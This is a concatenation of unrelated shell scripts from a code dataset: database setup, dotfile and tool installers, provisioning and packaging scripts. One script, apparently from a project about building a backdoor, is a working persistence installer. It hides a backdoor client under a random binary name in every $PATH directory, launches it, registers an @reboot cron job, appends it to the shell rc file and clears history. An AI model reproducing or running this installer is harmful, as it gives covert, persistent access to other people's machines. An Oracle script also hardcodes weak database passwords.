if [ ! -f "$SYMBOL_FILE" ]; then
echo "$SYMBOL_FILE not found"
exit 1
elif [ ! -f "$SYMBOL_PATCH" ]; then
echo "$SYMBOL_PATCH not found"
exit 1
elif [ ! -f "$EVDEV_FILE" ]; then
echo "$EVDEV_FILE not found"
exit 1
elif [ ! -f "$EVDEV_PATCH" ]; then
echo "$EVDEV_PATCH not found"
exit 1
fi
# if not already patched and dry-run succeeds, apply patch
if patch -R -N --silent --dry-run "$SYMBOL_FILE" "$SYMBOL_PATCH" 1>&2>/dev/null; then
echo "$SYMBOL_FILE already patched, skipping..." 1>&2
else
if patch -N --silent --dry-run "$SYMBOL_FILE" "$SYMBOL_PATCH" 2>/dev/null; then
patch -b -N --silent "$SYMBOL_FILE" "$SYMBOL_PATCH" 2>/dev/null
echo "$SYMBOL_FILE patched"
fi
fi
if patch -R -N --silent --dry-run "$EVDEV_FILE" "$EVDEV_PATCH" 1>&2>/dev/null; then
echo "$EVDEV_FILE already patched, skipping..." 1>&2
else
if patch -N --silent --dry-run "$EVDEV_FILE" "$EVDEV_PATCH" 2>/dev/null; then
patch -b -N --silent "$EVDEV_FILE" "$EVDEV_PATCH" 2>/dev/null
echo "$EVDEV_FILE patched"
fi
fi
echo "Done"
| true
|
aaf286198322d79b80a7a2a463612350831d0fcb
|
Shell
|
lucasmrdt/how-i-created-a-backdoor
|
/advanced-backdoor/setup.sh
|
UTF-8
| 945
| 3.921875
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
FROM_PATH="$(dirname $0)/backdoor-client.py" # Backdoor script path
TARGET_NAME="$(ls /usr/bin | sort -R | head -n 1)-" # Final script name
# For each path in $PATH, try to copy our backdoor script into it
IFS=':' read -ra PATHS <<< "$PATH"
for path in "${PATHS[@]}"; do
echo $path
mkdir -p $path > /dev/null 2>&1
cp $FROM_PATH "$path/$TARGET_NAME" > /dev/null 2>&1
done
$TARGET_NAME # Run our script, should be in one of $PATH
## CRONTAB
CRONFILE="tmp"
PATH_SCRIPT=$(which $TARGET_NAME) # Get the path of the backdoor
echo "@reboot $PATH_SCRIPT" > $CRONFILE # Write a cron task
$(crontab $CRONFILE > /dev/null 2>&1) # Update crontab with the file
rm -f $CRONFILE # Remove the file
## SHELL CONFIG
SHELL=$(basename $SHELL) # Get the shell name
CONFIG_PATH="$HOME/.${SHELL}rc" # Get the shell config file
echo "$TARGET_NAME" >> $CONFIG_PATH # Append our script into the shell config
history -c # Clear the history
| true
|
43b2001c01005da380142430f4e17676cb6eb718
|
Shell
|
michaelcunningham/oracledba
|
/scripts/load_puridiom.sh
|
UTF-8
| 2,290
| 3.25
| 3
|
[] |
no_license
|
#!/bin/sh
#
# This must be run first to create the external directory with the correct permissions
# on the filer.
# /oracle/app/oracle/admin/dwdev/create/create_external_data_directory.sh
#
# /oracle/app/oracle/admin/dwdev/create/create_tdcuser_user.sh $ORACLE_SID
# /oracle/app/oracle/admin/dwdev/export/impdp_tdcuser.sh
# /oracle/app/oracle/admin/dwdev/create/privs_tdcpo.sh
#
# Don't forget to create the tdcpo user
#
if [ "$1" = "" ]
then
echo
echo " Usage : $0 <ORACLE_SID>"
echo
echo " Example : $0 dwdev"
echo
exit
fi
export ORACLE_SID=$1
export ORAENV_ASK=NO
. /usr/local/bin/oraenv
. /dba/admin/dba.lib
log_date=`date +%Y%m%d`
adhoc_dir=/oracle/app/oracle/admin/$ORACLE_SID/adhoc
log_dir=$adhoc_dir/log
log_file=$log_dir/load_puridiom_$log_date.log
ext_dir=/$ORACLE_SID/external
dataload_dir=$ext_dir/dataload
ext_gz_file=$dataload_dir/puridiom.gz
load_file_name=$dataload_dir/puridiom_data.dmp
if [ ! -f $ext_gz_file ]
then
result=2
exit $result
fi
gunzip $ext_gz_file
ext_file_name=`ls -rt1 $dataload_dir | tail -1`
#echo $ext_file_name
# Rename the extracted file to a standard name we need so we can use it with data pump.
#echo $ext_dir/$ext_file_name
#echo $load_file_name
#echo "move "$dataload_dir/$ext_file_name" to "$load_file_name
mv $dataload_dir/$ext_file_name $load_file_name
mkdir -p /$ORACLE_SID/external/archive
#echo $load_file_name
#echo $ext_dir/archive/puridiom_data_$log_date.dmp
#echo "copy "$load_file_name" to "$ext_dir/archive/puridiom_data_$log_date.dmp
cp $load_file_name $ext_dir/archive/puridiom_data_$log_date.dmp
/dba/admin/kill_all_username.sh $ORACLE_SID tdcuser
/oracle/app/oracle/admin/dwdev/create/create_tdcuser_user.sh $ORACLE_SID
/oracle/app/oracle/admin/dwdev/export/impdp_tdcuser.sh
# Now that the load is complete we want to move the log file left behind by data pump
# to a log directory. The name of this file is listed in the *.par file used
# by data pump.
mkdir -p /$ORACLE_SID/external/log
mv $dataload_dir/puridiom_data_load.log $ext_dir/log/puridiom_data_load_$log_date.log
# Now we need to grant permissions to the TDCPO user for the TDCUSER objects.
/oracle/app/oracle/admin/dwdev/create/privs_tdcpo.sh
sqlplus -s /nolog << EOF >> $log_file
connect / as sysdba
@utlrp
exit;
EOF
| true
|
89a65ad78aca20da9acf1ead5f9673704df5ef21
|
Shell
|
thiscoldhouse/stuff
|
/ops_templates/update_secrets.template.sh
|
UTF-8
| 2,320
| 4.21875
| 4
|
[] |
no_license
|
# Intended usage:
# update_env.sh /path/to/secretfile
# to encrypt your file:
# gpg -c /path/to/secretfile
# Result:
# - will drop a new version of secretfile in the same dir as secretfile.pgp
# Checks:
# - asks if you want to overwrite existing before continuing
# =================== handy yaml parsing i took from SO =================== #
parse_yaml() {
local prefix=$2
local s='[[:space:]]*' w='[a-zA-Z0-9_]*' fs=$(echo @|tr @ '\034')
sed -ne "s|^\($s\)\($w\)$s:$s\"\(.*\)\"$s\$|\1$fs\2$fs\3|p" \
-e "s|^\($s\)\($w\)$s:$s\(.*\)$s\$|\1$fs\2$fs\3|p" $1 |
awk -F$fs '{
indent = length($1)/2;
vname[indent] = $2;
for (i in vname) {if (i > indent) {delete vname[i]}}
if (length($3) > 0) {
vn=""; for (i=0; i<indent; i++) {vn=(vn)(vname[i])("_")}
printf("%s%s%s=\"%s\"\n", "'$prefix'",vn, $2, $3);
}
}'
}
# =================== check if file exists ===================
if [ -f $(dirname $1)/$secrets ];
then
read -r -p "File $secrets already exists, are you sure? The old one will be moved to $secrets.bck if you continue[y/N] " response
case "$response" in
[yY][eE][sS]|[yY])
echo "Great, continuing"
mv $(dirname $1)/$secrets $(dirname $1)/$secrets.bck
echo "Current $secrets moved to $secrets.bck"
;;
*)
echo "Exiting safely"
exit 0
;;
esac
fi
# =================== FOR YAML FILES =================== #
# check that every variable specified in dev is also in prod
for devvar in $(gpg --pinentry-mode=loopback --decrypt $1 | parse_yaml | grep dev);
do
devvar="${devvar/dev_/}"
devvar=(${devvar//=/ })
devvar=${devvar[0]}
FOUND=0
if [[ $devvar == *"dev"* ]];
# this makes sure dev isn't in the value, but in the
# actual variable name
then
for prodvar in $(gpg --pinentry-mode=loopback --decrypt $1 | parse_yaml | grep prod)
do
prodvar="${prodvar/prod_/}"
prodvar=(${prodvar//=/ })
prodvar=${prodvar[0]}
if [ "$devvar" == "$prodvar" ]; then
FOUND=1
break
fi
done
if [ $FOUND == 0 ]; then
echo "Missing variable $devvar in production, exiting safely"
exit 1
fi
fi
done
# =================== DECRYPT ===================
gpg --pinentry-mode=loopback --decrypt $1 > $(dirname $1)/$secrets
| true
|
1d3a89c5776a565a796cc4eb0451e46d0d497389
|
Shell
|
skanapar/DB_SCRIPTS
|
/bin/sidlist
|
UTF-8
| 348
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/ksh
ORATAB=/etc/oratab
DEFAULT_IFS=$IFS
NEWLINE="
"
SID_LIST=`grep -v "^#" $ORATAB | grep -v "^$" | grep -v "^\*" | awk -F: '{print $1}' | sort`
if [ "`echo "$SID_LIST" | wc -w`" -gt 1 ]; then
echo " Available Oracle Environments:"
IFS="$NEWLINE"
for SID in $SID_LIST; do
echo " - $SID"
done
fi
IFS=DEFAULT_IFS
| true
|
52ca5ba9cf444fa81f084f2201f74dbac494dbae
|
Shell
|
seem-sky/FrameworkBenchmarks
|
/toolset/setup/linux/languages/pypy.sh
|
UTF-8
| 378
| 2.96875
| 3
|
[] |
no_license
|
#!/bin/bash
RETCODE=$(fw_exists pypy)
[ ! "$RETCODE" == 0 ] || { return 0; }
fw_get https://bitbucket.org/pypy/pypy/downloads/pypy-2.3.1-linux64.tar.bz2 -O pypy-2.3.1-linux64.tar.bz2
tar vxf pypy-2.3.1-linux64.tar.bz2
ln -sf pypy-2.3.1-linux64 pypy
fw_get https://bootstrap.pypa.io/get-pip.py
pypy/bin/pypy get-pip.py
pypy/bin/pip install -r ../config/requirements-pypy.txt
| true
|
e104f3cf08d9e9b561d804e481012e535c8e3b11
|
Shell
|
fnord0/blackarch
|
/packages/nfex/PKGBUILD
|
UTF-8
| 674
| 2.703125
| 3
|
[] |
no_license
|
pkgname=nfex
pkgver=2.5
pkgrel=1
epoch=100
groups=('blackarch' 'blackarch-forensic' 'blackarch-networking')
pkgdesc="A tool for extracting files from the network in real-time or post-capture from an offline tcpdump pcap savefile. It is based off of the code-base from the apparently defunct project tcpxtract. "
arch=('i686' 'x86_64' 'armv6h' 'armv7h')
url="https://code.google.com/p/nfex/"
license=('GPL2')
makedepends=('subversion' 'libpcap' 'libnet')
source=('svn+http://nfex.googlecode.com/svn/trunk/')
md5sums=('SKIP')
build() {
cd "$srcdir/trunk"
./configure
make
}
package() {
cd "$srcdir/trunk"
# Bin.
install -Dm755 src/nfex "$pkgdir/usr/bin/nfex"
}
| true
|
38b97bc4995e9b5d7bfff6e8d045177d75361838
|
Shell
|
huanglingmin/Node-Mongodb-Mysql
|
/sequelize-auto-generate.sh
|
UTF-8
| 443
| 2.953125
| 3
|
[] |
no_license
|
TABLE=${1}
if [ -z ${TABLE} ]; then
echo "Usage: ${0} 表名称 生成对应的表模型到 ./models 下"
exit 0
fi
echo "生成表 ${TABLE}..."
# sequelize-auto -o "./models/table" -d weixin -h localhost -u root -p 3306 -x Root@123 -e mysql;
# sequelize-gen -h localhost -p 3306 -d node -u hlm -x Root@123 -e mysql -o ./models/table;
#sequelize-auto -h localhost -p 3306 -d node -u hlm -x Root@123 --dialect mysql -C -o ./models/table
| true
|
153684a02de69f5a9b30c063d9231a31bb115947
|
Shell
|
rakib32/golang-api-template
|
/run.sh
|
UTF-8
| 484
| 2.734375
| 3
|
[] |
no_license
|
#! /bin/sh
# booting up dependecy containers
docker-compose up -d
# Build go program
echo "building tests API ..."
export GO111MODULE=on
CGO_ENABLED=0 GOFLAGS=-mod=vendor go build
# setting KV, dependecy of app
echo "putting consul config ..."
curl --request PUT --data-binary @config.local.yml http://localhost:8500/v1/kv/test-api
echo "$(date "+%H:%M:%S") - consul values updated!"
# Run the app
export CONSUL_URL="127.0.0.1:8500"
export CONSUL_PATH="test-api"
./test-api serve
| true
|
87ad4c1317026c708a66cf783a59f1b0691ba047
|
Shell
|
tbaumeist/FreeNet-Analysis
|
/Scripts/archive/exp_1_recordInsertPaths.sh
|
UTF-8
| 4,531
| 3.546875
| 4
|
[] |
no_license
|
#!/bin/bash
# Variables
_insertRandomWord=./insertRandomData.sh
_netTopology=./networkTopology.sh
_wordInserted="_randomFreenetWords.dat"
_telnetPort=8887
_telnetScript=./common/telnet.exp
_netTopology=./networkTopology.sh
_topCheckInterval=5
#Parameters
#1 Archive file name
function reset
{
$_telnetScript "localhost" $_telnetPort "CMD>" "reset"
$_telnetScript "localhost" $_telnetPort "CMD>" "archivechks $1"
}
#Parameters
#1 count
function saveTopology
{
#save topology
$_netTopology $configFile $password "$saveDir" "top-$1.dot"
let "prev=$1-$_topCheckInterval"
if [ $prev -gt 0 ]
then
local dif=$(diff "$saveDir""top-$prev.dot" "$saveDir""top-$1.dot" | wc -m)
if [ $dif -eq 0 ]
then
rm "$saveDir""top-$prev.dot"
rm "$saveDir""top-$prev.dot.png"
fi
fi
}
#===================================================================================================
# Main Entry Point
#===================================================================================================
# parameters
# 1 Configuration file
# 2 Count
# 3 Save Directory
source ./common/parameters.sh
declare configFile
declare password
declare randomCount
declare saveDir
declare fileName
declare attackMonitorHost
declare attackCloudHost
defFileName="exp_1_recordInsertPaths $(date --rfc-3339=seconds).dat"
defFileName=$(echo $defFileName | sed -e 's/ /_/g' -e 's/:/\-/g')
ParameterScriptWelcome "exp_1_recordInsertPaths.sh"
ParameterConfigurationFile configFile $1
ParameterPassword password $2
ParameterRandomCount randomCount "How many random words to insert per node? " $3
ParameterSaveDirectoryGeneral saveDir $4
ParameterFileName fileName $defFileName $5
ParameterScriptWelcomeEnd
#===================================================================================================
# check if debug server running
echo -n "Checking Debug Server Running: "
if nc -zv -w30 localhost $_telnetPort <<< ” &> /dev/null
then
echo "OK"
else
echo "FAILED"
echo "***************************************************************"
echo "Please start the debug server with the ./runRemote.sh script"
echo "***************************************************************"
exit
fi
fullFileName=$saveDir$fileName
echo "Creating file $fullFileName"
mkdir -p $saveDir
archiveFile=$saveDir"archive.dat"
#reset the list of inserted random words
rm "$saveDir$_wordInserted"
#Number of lines in $configFile
lineCount=`awk 'NF!=0 {++c} END {print c}' $configFile`
# setup the archive file on the debug server
reset $archiveFile
wordCount=1
for i in `seq $lineCount`
do
line=$(sed -n "$i p" $configFile)
remoteMachine=$(echo $line | cut -d',' -f1)
for h in `seq $randomCount`
do
let "saveCheck=$h%$_topCheckInterval"
if [ $saveCheck -eq 0 ]
then
saveTopology $wordCount
# insert the random word
$_insertRandomWord $_topCheckInterval $remoteMachine $saveDir $_wordInserted
fi
let "wordCount=$wordCount+1"
done
# process the data to find the final path taken
grep "message_chk:freenet.keys.nodechk" $archiveFile > $archiveFile"-$wordCount"
reset $archiveFile
#################################################################################
prevKey=""
fromNode=""
toNode=""
count=0
ignoreKey=""
outputLine=""
location=-1
grep "Sent" "$archiveFile-$wordCount" > "$archiveFile-tmp"
while read archiveLine
do
let "count=$count+1"
currentKey=$(echo $archiveLine | cut -d'@' -f3 | cut -d':' -f1)
htl=$(echo $archiveLine | cut -d':' -f8 | cut -d',' -f1)
# new key
if [ "$currentKey" != "$prevKey" ]
then
echo $outputLine >> $fullFileName
echo $outputLine
location=$(cat "$saveDir$_wordInserted" | grep -i "$currentKey" | cut -d':' -f3)
if [ "$location" = "" ]
then
outputLine="UNKNOWN $currentKey "
else
outputLine="$location "
fi
fromNode=""
toNode=""
ignoreKey=""
prevhtl=$htl
fi
prevKey=$currentKey
# repeat section of the data file
if [ $htl -gt $prevhtl ]
then
ignoreKey=$currentKey
fi
if [ "$ignoreKey" = "$currentKey" ]
then
#echo "ignored entry"
continue
fi
fromNode=$(echo $archiveLine | cut -d' ' -f1)
toNode=$(echo $archiveLine | cut -d':' -f8 | cut -d' ' -f5)
outputLine="$outputLine $fromNode $toNode $htl "
prevhtl=$htl
done < "$archiveFile-tmp"
rm "$archiveFile-tmp"
echo $outputLine >> $fullFileName
echo $outputLine
#################################################################################
done
echo "********** Experiment Complete ***************"
| true
|
cc1f0f8fa07958649a4a9a6d458ff96df7927ad8
|
Shell
|
YuanzhiBao/Notes
|
/scripts/text2pdf.sh
|
UTF-8
| 99
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/bash
echo "input file name: $1"
f="$1"
enscript "$1" --output=- | pstopdf -o ${f%%.*}.pdf
| true
|
28c345b188ac7678b284d24851b578d1bc060f36
|
Shell
|
willmao/devops-notes
|
/softwares/ldap/server/docker-entrypoint.sh
|
UTF-8
| 1,566
| 3.6875
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -e
OPENLDAP_BASE_DIR=/usr/local/openldap
OPENLDAP_CONF_DIR=${OPENLDAP_BASE_DIR}/slapd.d
OPENLDAP_DB_BASE_DIR=${OPENLDAP_BASE_DIR}/dbs
# databases to init
OPENLDAP_DB_NAMES=(
example
)
OPENLDAP_LOG_LEVEL=${OPENLDAP_LOG_LEVEL:-0}
OPENLDAP_USER_NAME=ldap
OPENLDAP_USER_GROUP=ldap
OPENLDAP_SERVE_URLS=${OPENLDAP_SERVE_URLS:-"ldap:/// ldaps:///"}
echo "check root folder"
if [[ ! -d ${OPENLDAP_BASE_DIR} ]]; then
echo "oepnldap root folder doest not exist, please mount it into docker container"
exit -1
fi
if [[ ! -d ${OPENLDAP_CONF_DIR} ]]; then
echo "openldap config folder does not exist, auto create it"
mkdir -p ${OPENLDAP_CONF_DIR}
fi
if [[ ! -d ${OPENLDAP_DB_BASE_DIR} ]]; then
echo "openldap database base folder does not exist, auto create it"
mkdir -p ${OPENLDAP_DB_BASE_DIR}
fi
for db in "${OPENLDAP_DB_NAMES[@]}"; do
db_path=${OPENLDAP_DB_BASE_DIR}/${db}
if [[ ! -d ${db_path} ]]; then
echo "openldap database ${db} path does not exist,auto create it"
mkdir -p ${db_path}
fi
done
cd ${OPENLDAP_BASE_DIR}
if [[ -z "$(ls -A ${OPENLDAP_CONF_DIR})" ]]; then
echo "init openldap config"
slapadd -d any -n 0 -F ./slapd.d -l ./slapd.ldif
else
echo "openldap config already exist"
fi
echo "fix openldap folder permission"
chown -R ${OPENLDAP_USER_NAME}:${OPENLDAP_USER_GROUP} ${OPENLDAP_BASE_DIR}
echo "start openldap slapd service with user ${OPENLDAP_USER_NAME}"
exec slapd -F ${OPENLDAP_CONF_DIR} -u ${OPENLDAP_USER_NAME} -g ${OPENLDAP_USER_GROUP} -d ${OPENLDAP_LOG_LEVEL} -h "${OPENLDAP_SERVE_URLS}"
| true
|
4d89abd5fc8db384c4a407d9ceae614c1c875011
|
Shell
|
tomtseng/dotfiles
|
/install.sh
|
UTF-8
| 3,206
| 3.328125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
abort() {
local msg=${1}
echo ${msg}
echo "Aborting."
exit 1
}
if [ "$(uname)" == "Darwin" ]; then
os="mac"
elif [ "$(expr substr $(uname -s) 1 5)" == "Linux" ]; then # Linux
os="linux"
else
abort "Could not determine OS."
fi
#######################
# Package manager setup
#######################
if [ ${os} == "mac" ]; then
# Install brew
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
brew update
elif [ ${os} == "linux" ]; then
sudo apt --assume-yes update
sudo apt --assume-yes upgrade
fi
# Miscellaneous installations
if [ ${os} == "mac" ]; then
brew install mosh
elif [ ${os} == "linux" ]; then
sudo apt --assume-yes install mosh
fi
###########
# fzf setup
###########
git clone --depth 1 https://github.com/junegunn/fzf.git ~/.fzf
~/.fzf/install --key-bindings --completion --no-update-rc
###############
# ripgrep setup
###############
if [ ${os} == "mac" ]; then
brew install ripgrep
elif [ ${os} == "linux" ]; then
curl --location --remote-name https://github.com/BurntSushi/ripgrep/releases/download/11.0.2/ripgrep_11.0.2_amd64.deb
sudo dpkg --install ripgrep_11.0.2_amd64.deb
rm ripgrep_11.0.2_amd64.deb
fi
###########
# zsh setup
###########
if [ ${os} == "mac" ]; then
brew install zsh zsh-completions
elif [ ${os} == "linux" ]; then
sudo apt --assume-yes install zsh
fi
chsh -s $(which zsh)
RUNZSH=no bash -c "$(curl --fail --silent --show-error --location https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)"
cp .zshrc ~/.zshrc
cp .oh-my-zsh/themes/* ~/.oh-my-zsh/themes/
git clone https://github.com/zsh-users/zsh-autosuggestions ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-autosuggestions
git clone https://github.com/zsh-users/zsh-syntax-highlighting.git ${ZSH_CUSTOM:-~/.oh-my-zsh/custom}/plugins/zsh-syntax-highlighting
############
## Vim setup
############
# Update vim to get useful support like clipboard and clientserver
if [ ${os} == "mac" ]; then
brew install vim
elif [ ${os} == "linux" ]; then
sudo apt --assume-yes install vim-gtk
fi
cp .vimrc ~/.vimrc
mkdir -p ~/.vim/colors
cd ~/.vim/colors
curl --remote-name https://raw.githubusercontent.com/nanotech/jellybeans.vim/master/colors/jellybeans.vim
cd -
git clone https://github.com/VundleVim/Vundle.vim.git ~/.vim/bundle/Vundle.vim
vim +PluginInstall +qall
if [ ${os} == "mac" ]; then
brew install cmake macvim
cd ~/.vim/bundle/YouCompleteMe
./install.py --clang-completer
cd -
elif [ ${os} == "linux" ]; then
sudo apt --assume-yes install build-essential cmake python3-dev
cd ~/.vim/bundle/YouCompleteMe
python3 install.py --clang-completer
cd -
fi
cp -r .vim/UltiSnips ~/.vim
mkdir -p ~/.vim/bundle/YouCompleteMe/cpp
cp basic_ycm_extra_conf.py ~/.vim/bundle/YouCompleteMe/cpp/ycm_extra_conf.py
###########
# tmux setup
###########
if [ ${os} == "mac" ]; then
brew install tmux
elif [ ${os} == "linux" ]; then
sudo apt --assume-yes install tmux
fi
cp .tmux.conf ~/.tmux.conf
###########
# git setup
###########
git config --global user.name "Tom Tseng"
git config --global user.email "tom.hm.tseng@gmail.com"
git config --global core.editor "vim"
| true
|
d73067b86f06bc5df5e961b7a4ab68fb4844df73
|
Shell
|
nobukatsu/template
|
/shell-script/basic.sh
|
UTF-8
| 643
| 3.96875
| 4
|
[] |
no_license
|
#!/bin/bash
ARGUMENT1=
ARGUMENT2=
ARGUMENT3=
function usage() {
echo "Usage: $0 -a <argument1> -b <argument2> -c <argument3>"
exit 1
}
while getopts ":a:b:c:h" opt; do
case $opt in
a)
ARGUMENT1=${OPTARG} ;;
b)
ARGUMENT2=${OPTARG} ;;
c)
ARGUMENT3=${OPTARG} ;;
h)
usage ;;
\?)
echo "Invalid option: -${OPTARG}" >&2
usage ;;
esac
done
[ -z "${ARGUMENT2}" ] && echo "argument2 is required." && usage
echo "Do something."
echo "argument1: ${ARGUMENT1}"
echo "argument2: ${ARGUMENT2}"
echo "argument3: ${ARGUMENT3}"
| true
|
c3e88a5986593c0d665a02772be487f87fa5ee0f
|
Shell
|
kerin/piwik-docker
|
/scripts/start.sh
|
UTF-8
| 970
| 3.765625
| 4
|
[] |
no_license
|
#!/bin/bash
# Starts up MariaDB within the container.
# Stop on error
set -e
DATA_DIR=/data
MYSQL_LOG=$DATA_DIR/mysql.log
PIWIK_DIR=/var/lib/piwik
if [[ -e /firstrun ]]; then
source /scripts/first_run.sh
else
source /scripts/normal_run.sh
fi
# Make sure Piwik config file is symlinked from volume -> www dir
if [[ ! -L "/var/www/html/config" ]]; then
cp -R /var/www/html/config $PIWIK_DIR
rm -rf /var/www/html/config
chmod a+w $PIWIK_DIR/config
ln -s /var/lib/piwik/config /var/www/html/config
fi
wait_for_mysql_and_run_post_start_action() {
# Wait for mysql to finish starting up first.
while [[ ! -e /run/mysqld/mysqld.sock ]] ; do
inotifywait -q -e create /run/mysqld/ >> /dev/null
done
post_start_action
}
pre_start_action
wait_for_mysql_and_run_post_start_action &
echo "Starting Apache..."
service apache2 start
# Start MariaDB
echo "Starting MariaDB..."
exec /usr/bin/mysqld_safe --skip-syslog --log-error=$MYSQL_LOG
| true
|
f5e5e05465bb74b1bbcb7afddcdeb8b0c0bbcc0b
|
Shell
|
omkardhulap/VagrantWorks
|
/InfraCloud/Assessment1/files/provision.sh
|
UTF-8
| 2,684
| 3.203125
| 3
|
[] |
no_license
|
#!/bin/bash
echo "installing apache"
apt-get update >/dev/null 2>&1
apt-get install -y apache2 >/dev/null 2>&1
cp /tmp/site.conf /etc/apache2/sites-available/site.conf > /dev/null
a2ensite site.conf > /dev/null
#echo "installing apache security config"
#apt-get update >/dev/null 2>&1
#apt-get install apache2-utils >/dev/null 2>&1
#whereis htpasswd
#sudo htpasswd -b -c /etc/apache2/.htpasswd admin admin
echo "Hi, I am learning right now. I'm just an example of how to evolve provisioning with shell scripts."
service apache2 start 1>&2 > /dev/null # I lied
netstat -ap | grep apache2
echo "install memcache dependancy"
type whereis libevent
wget http://www.monkey.org/~provos/libevent-1.4.8-stable.tar.gz
tar xfz libevent-1.4.8-stable.tar.gz
cd libevent-1.4.8-stable
./configure && make && sudo make install
sudo ln -s /usr/local/lib/libevent-1.4.so.2 /usr/lib
echo "install memcache"
wget https://memcached.org/files/memcached-1.4.31.tar.gz
echo | tar -zxvf memcached-1.4.31.tar.gz
cd memcached-1.4.31
./configure && make && make test && sudo make install
echo "run memcache as demon"
memcached -d -m 4096 -u root -l 127.0.0.1 -p 11211
echo "checking memcache running"
netstat -ap | grep 11211
echo "Cron Script executed from: ${PWD}"
ls -lrt
value=$(<exercise-memcached.sh)
echo "$value"
whereis bash
PATH="$PATH":/home/vagrant
* * * * * /bin/bash ./exercise-memcached.sh
echo "checking memcache stats >>"
echo stats | nc 127.0.0.1 11211
#echo "Installing memcached stats monitoring tool"
#wget http://phpmemcacheadmin.googlecode.com/files/phpMemcachedAdmin-1.2.2-r262.tar.gz
#tar xfz phpMemcachedAdmin-1.2.2-r262.tar.gz -C /var/www/phpMemcachedAdmin
#chmod +rx *
#chmod 0777 /var/www/phpMemcachedAdmin/Config/Memcache.php
#chmod 0777 /var/www/phpMemcachedAdmin/Temp/
#chmod 0777 /var/www/phpMemcachedAdmin
#mv /home/vagrant/phpMemcachedAdmin.conf /etc/apache2/sites-enabled
#echo "I screwed-up"
pip install flask
#sudo apt-get install -y python-memcache
#sudo apt-get install -y rrdtool
#pip install 'git+git://github.com/omkardhulap/FakingMonkey/blob/master/monitoring/memcached_stats_rrd.py'
#chmod 0777 /home/vagrant/memcached_stats_rrd.py
#cp /home/vagrant/memcached_stats_rrd.py /var/www/memcached_stats_rrd.py > /dev/null
#*/1 * * * * /var/www/memcached_stats_rrd.py
#echo "I screwed-up more"
sudo apt-get update
sudo apt-get install git # no space to install git and test further
pip install 'git+git://github.com/dlrust/python-memcached-stats.git'
python -m memcached_stats 127.0.0.1 11211
echo "replace modified app.py file"
chmod 0777 /home/vagrant/app.py
cp /home/vagrant/app.py /var/www/app/app.py # yet to test modified file
service apache2 restart
| true
|
6b430c0b0e5d0b3e6ac98b38f0d2027d1a52fef4
|
Shell
|
lastnitescurry/dctm-vagrant-puppet
|
/puppet/modules/oracle/files/oracle-xe-reset-passwords.sh
|
UTF-8
| 2,203
| 3.09375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
#
#
# chkconfig: 2345 80 05
# description: This is a program that is responsible for taking care of
# configuring the Oracle Database 11g Express Edition and its associated
# services.
#
# processname: oracle-xe
# Red Hat or SuSE config: /etc/sysconfig/oracle-xe
# Debian or Ubuntu config: /etc/default/oracle-xe
#
# change log:
# svaggu 02/19/11 - /etc/oratab permissions are updated to 664
# svaggu 12/20/10 - apex updates.
# svaggu 07/28/10 - Creation
#
# Brian July 2015 - repurpose to reset oracle passwords
# Source fuction library
if [ -f /lib/lsb/init-functions ]
then
. /lib/lsb/init-functions
elif [ -f /etc/init.d/functions ]
then
. /etc/init.d/functions
fi
# Set path if path not set (if called from /etc/rc)
case $PATH in
"") PATH=/bin:/usr/bin:/sbin:/etc
export PATH ;;
esac
# Save LD_LIBRARY_PATH
SAVE_LLP=$LD_LIBRARY_PATH
RETVAL=0
export ORACLE_HOME=/u01/app/oracle/product/11.2.0/xe
export ORACLE_SID=XE
export ORACLE_BASE=/u01/app/oracle
export PATH=$ORACLE_HOME/bin:$PATH
LSNR=$ORACLE_HOME/bin/lsnrctl
SQLPLUS=$ORACLE_HOME/bin/sqlplus
ORACLE_OWNER=oracle
LOG="$ORACLE_HOME_LISTNER/listener.log"
if [ -z "$CHOWN" ]; then CHOWN=/bin/chown; fi
if [ -z "$CHMOD" ]; then CHMOD=/bin/chmod; fi
if [ -z "$HOSTNAME" ]; then HOSTNAME=/bin/hostname; fi
if [ -z "$NSLOOKUP" ]; then NSLOOKUP=/usr/bin/nslookup; fi
if [ -z "$GREP" ]; then GREP=/usr/bin/grep; fi
if [ ! -f "$GREP" ]; then GREP=/bin/grep; fi
if [ -z "$SED" ]; then SED=/bin/sed; fi
if [ -z "$AWK" ]; then AWK=/bin/awk; fi
if [ -z "$SU" ];then SU=/bin/su; fi
export LC_ALL=C
if [ $(id -u) != "0" ]
then
echo "You must be root user to run the configure script."
exit 1
fi
echo alter user sys identified by vagrant\; | $SU -s /bin/bash $ORACLE_OWNER -c "$SQLPLUS -s / as sysdba" > /dev/null 2>&1
echo alter user system identified by vagrant\; | $SU -s /bin/bash $ORACLE_OWNER -c "$SQLPLUS -s / as sysdba" > /dev/null 2>&1
# Enabling Remote HTTP Connection to the Database
# http://docs.oracle.com/cd/E17781_01/server.112/e18804/network.htm#ADMQS171
#echo EXEC DBMS_XDB.SETLISTENERLOCALACCESS(FALSE)\; | $SU -s /bin/bash $ORACLE_OWNER -c "$SQLPLUS -s / as sysdba" > /dev/null 2>&1
exit 0
| true
|
3c16b17148cf9f7d6b7abc9fbffd419429b2b1dd
|
Shell
|
cloud-security-research/sgx-kms
|
/makeself_installer.sh
|
UTF-8
| 1,106
| 2.90625
| 3
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
#!/bin/bash
apt-get install makeself
CWD=`pwd`
cd $CWD/BarbiE
./deploy.sh
cd $CWD
BarbiE=$CWD"/BarbiE/release"
Client=$CWD"/Barbican/Client"
Server=$CWD"/Barbican/Server"
install_script=$CWD"/install.sh"
uninstall_script=$CWD"/uninstall.sh"
startup_script=$CWD"/startup.sh"
env_file=$CWD"/env.properties"
rabbit_mq_file=$CWD"/rabbit_mq.properties"
target=$CWD"/target"
mkdir $target
mkdir $target/test_scripts
mkdir $target/lib
cp -r $startup_script $target
cp -r $env_file $target
cp -r $rabbit_mq_file $target
cp -r $BarbiE/* $target/lib
cp -r $Client/sgx.py $target/test_scripts/
cp -r $Client/sgx.h $target/test_scripts/
cp -r $Client/sgx_client_wo_hw.py $target/test_scripts/
cp -r $Client/sgx_client_with_hw.py $target/test_scripts/
cp -r $Client/project_policy_mgmt.py $target/test_scripts/
